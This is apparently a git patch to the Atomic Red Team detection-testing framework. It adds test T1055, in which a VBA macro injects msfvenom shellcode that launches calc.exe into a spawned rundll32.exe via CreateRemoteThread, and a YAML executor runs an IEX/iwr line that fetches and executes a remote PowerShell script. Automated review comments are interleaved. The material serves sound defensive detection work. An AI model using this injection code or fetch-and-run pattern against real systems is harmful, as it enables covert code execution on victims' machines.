From 9e352ddc2d86c859dce7aeb9987bef56134419bc Mon Sep 17 00:00:00 2001
From: Ama Smuggle Avocados <47680420+amasmuggleavocados@users.noreply.github.com>
Date: Fri, 11 Dec 2020 09:55:17 -0500
Subject: [PATCH] Shellcodevba (#1326)
* initial push for T1055 (Shellcode execution via VBA)
* updates
* updates
* updates
Co-authored-by: avocado
Co-authored-by: Carrie Roberts
---
 atomics/T1055/T1055.yaml | 28 ++++
 atomics/T1055/src/x64/T1055-macrocode.txt | 149 ++++++++++++++++++++++
 2 files changed, 177 insertions(+)
 create mode 100644 atomics/T1055/src/x64/T1055-macrocode.txt
diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml
index f686ab64..b97c2f1d 100644
--- a/atomics/T1055/T1055.yaml
+++ b/atomics/T1055/T1055.yaml
@@ -34,3 +34,31 @@ atomic_tests:
 mavinject $mypid /INJECTRUNNING #{dll_payload}
 name: powershell
 elevation_required: true
+- name: Shellcode execution via VBA
+ auto_generated_guid:
+ description: |
+ This module injects shellcode into a newly created process and executes. By default the shellcode is created,
+ with Metasploit, for use on x86-64 Windows 10 machines.
+
+ Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office
+ is required.
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ The 64-bit version of Microsoft Office must be installed
+ prereq_command: |
+ try {
+ $wdApp = New-Object -COMObject "Word.Application"
+ $path = $wdApp.Path
+ Stop-Process -Name "winword"
+ if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
+ } catch { exit 1 }
+ get_prereq_command: |
+ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
+ executor:
+ command: |
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
+ name: powershell
\ No newline at end of file
diff --git a/atomics/T1055/src/x64/T1055-macrocode.txt b/atomics/T1055/src/x64/T1055-macrocode.txt
new file mode 100644
index 00000000..1c7a0104
--- /dev/null
+++ b/atomics/T1055/src/x64/T1055-macrocode.txt
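Review bot: `auto_generated_guid:` is left empty and the new test has no `cleanup_command`, so the `rundll32.exe` process the macro creates (and the calc.exe payload it runs, per the msfvenom comment in the macro file) appears to be left behind after the run; fill in the GUID and add a cleanup step that stops the spawned process. The executor also pulls `Invoke-MalDoc.ps1` from the `master` branch and pipes it to `IEX` at run time, so what executes depends on the remote branch's state at that moment rather than on a reviewed revision — pin the URL to a commit or release tag (or ship the helper with the framework) so the test is reproducible and auditable. Finally, the prereq's `Stop-Process -Name "winword"` kills every Word instance on the host, including any document the operator has open; calling `$wdApp.Quit()` on the instance just created would release only that one.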
@@ -0,0 +1,149 @@
+Private Type PROCESS_INFORMATION
+ hProcess As Long
+ hThread As Long
+ dwProcessId As Long
+ dwThreadId As Long
+End Type
+
+Private Type STARTUPINFO
+ cb As Long
+ lpReserved As String
+ lpDesktop As String
+ lpTitle As String
+ dwX As Long
+ dwY As Long
+ dwXSize As Long
+ dwYSize As Long
+ dwXCountChars As Long
+ dwYCountChars As Long
+ dwFillAttribute As Long
+ dwFlags As Long
+ wShowWindow As Integer
+ cbReserved2 As Integer
+ lpReserved2 As Long
+ hStdInput As Long
+ hStdOutput As Long
+ hStdError As Long
+End Type
+
+Private Declare PtrSafe Function createRemoteThread Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, _
+ ByVal lpThreadAttributes As Long, _
+ ByVal dwStackSize As Long, _
+ ByVal lpStartAddress As LongPtr, _
+ lpParameter As Long, _
+ ByVal dwCreationFlags As Long, _
+ lpThreadID As Long) As LongPtr
+
+Private Declare PtrSafe Function virtualAllocEx Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, _
+ ByVal lpAddr As Long, _
+ ByVal lSize As Long, _
+ ByVal flAllocationType As Long, _
+ ByVal flProtect As Long) As LongPtr
+
+Private Declare PtrSafe Function writeProcessMemory Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, _
+ ByVal lDest As LongPtr, _
+ ByRef Source As Any, _
+ ByVal Length As Long, _
+ ByVal LengthWrote As LongPtr) As Boolean
+
+Private Declare PtrSafe Function createProcessA Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, _
+ ByVal lpCommandLine As String, _
+ lpProcessAttributes As Any, _
+ lpThreadAttributes As Any, _
+ ByVal bInheritHandles As Long, _
+ ByVal dwCreationFlags As Long, _
+ lpEnvironment As Any, _
+ ByVal lpCurrentDirectory As String, _
+ lpStartupInfo As STARTUPINFO, _
+ lpProcessInformation As PROCESS_INFORMATION) As Boolean
+
+Private Declare PtrSafe Function getProcessHandle Lib "kernel32" Alias "GetCurrentProcess" () As LongLong
+
+Private Sub Execute()
+
+Const MEM_COMMIT = &H1000
+Const 
PAGE_EXECUTE_READWRITE = &H40 + +Dim sc As String +Dim scLen As Long +Dim byteArray() As Byte +Dim memoryAddress As LongLong +Dim pHandle As LongLong +Dim sNull As String +Dim sInfo As STARTUPINFO +Dim pInfo As PROCESS_INFORMATION + +' ./msfvenom --arch x64 --platform windows -p windows/x64/exec CMD=calc.exe -f c +sc = "fc4883e4f0e8c00000004151415052" +sc = sc & "51564831d265488b5260488b521848" +sc = sc & "8b5220488b7250480fb74a4a4d31c9" +sc = sc & "4831c0ac3c617c022c2041c1c90d41" +sc = sc & "01c1e2ed524151488b52208b423c48" +sc = sc & "01d08b80880000004885c074674801" +sc = sc & "d0508b4818448b40204901d0e35648" +sc = sc & "ffc9418b34884801d64d31c94831c0" +sc = sc & "ac41c1c90d4101c138e075f14c034c" +sc = sc & "24084539d175d858448b40244901d0" +sc = sc & "66418b0c48448b401c4901d0418b04" +sc = sc & "884801d0415841585e595a41584159" +sc = sc & "415a4883ec204152ffe05841595a48" +sc = sc & "8b12e957ffffff5d48ba0100000000" +sc = sc & "000000488d8d0101000041ba318b6f" +sc = sc & "87ffd5bbf0b5a25641baa695bd9dff" +sc = sc & "d54883c4283c067c0a80fbe07505bb" +sc = sc & "4713726f6a00594189daffd563616c" +sc = sc & "632e65786500" + +scLen = Len(sc) / 2 +ReDim byteArray(0 To scLen) + +For i = 0 To scLen - 1 + If i = 0 Then + pos = i + 1 + Else + pos = i * 2 + 1 + End If + Value = Mid(sc, pos, 2) + byteArray(i) = Val("&H" & Value) +Next + +res = createProcessA(sNull, _ + "C:\Windows\System32\rundll32.exe", _ + ByVal 0&, _ + ByVal 0&, _ + ByVal 1&, _ + ByVal 4&, _ + ByVal 0&, _ + sNull, _ + sInfo, _ + pInfo) +Debug.Print "[+] CreateProcessA() returned: " & res + +newAllocBuffer = virtualAllocEx(pInfo.hProcess, _ + 0, _ + UBound(byteArray), _ + MEM_COMMIT, _ + PAGE_EXECUTE_READWRITE) +Debug.Print "[+] VirtualAllocEx() returned: 0x" & Hex(newAllocBuffer) + +Debug.Print "[*] Writing memory..." 
+For Offset = 0 To UBound(byteArray) + myByte = byteArray(Offset) + res = writeProcessMemory(pInfo.hProcess, _ + newAllocBuffer + Offset, _ + byteArray(Offset), _ + 1, _ + ByVal 0&) +Next Offset +Debug.Print "[+] WriteProcessMemory() returned: " & res + +Debug.Print "[+] Executing shellcode now..." +res = createRemoteThread(pInfo.hProcess, _ + 0, _ + 0, _ + newAllocBuffer, _ + 0, _ + 0, _ + 0) + +End Sub \ No newline at end of file
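Review bot: Several names in the new module are dead — `getProcessHandle` is declared but never called, `memoryAddress` and `pHandle` are dimmed but never used, and `myByte` in the write loop is assigned and then ignored — while `i`, `pos`, `Value`, `res`, `newAllocBuffer` and `Offset` are never declared at all, so they appear to fall back to implicit Variants; add `Option Explicit` at the top of the module, drop the dead names and `Dim` the rest with explicit types. The only documentation in the file is the msfvenom comment, so I would add a header comment stating that this is the Atomic Red Team macro for T1055 that exercises the CreateProcessA → VirtualAllocEx → WriteProcessMemory → CreateRemoteThread sequence from the Office process, that the expected observable is a `rundll32.exe` child of the Office process launching `calc.exe`, and that it needs 64-bit Office (as the YAML description already says), so a detection engineer reading the macro on its own knows which telemetry the test is meant to validate.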